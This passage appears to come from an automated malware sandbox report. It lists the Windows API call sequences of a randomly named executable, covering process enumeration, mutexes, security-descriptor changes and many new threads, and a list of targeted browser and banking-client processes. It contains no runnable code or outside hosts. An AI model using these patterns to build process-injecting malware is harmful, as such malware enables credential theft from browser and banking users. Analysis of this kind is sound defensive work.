Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_006A78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_006A78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe5_2_006A1900
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_00693610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_00693610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_00693610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_014E78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_014E78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_014E78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_014E6CA0
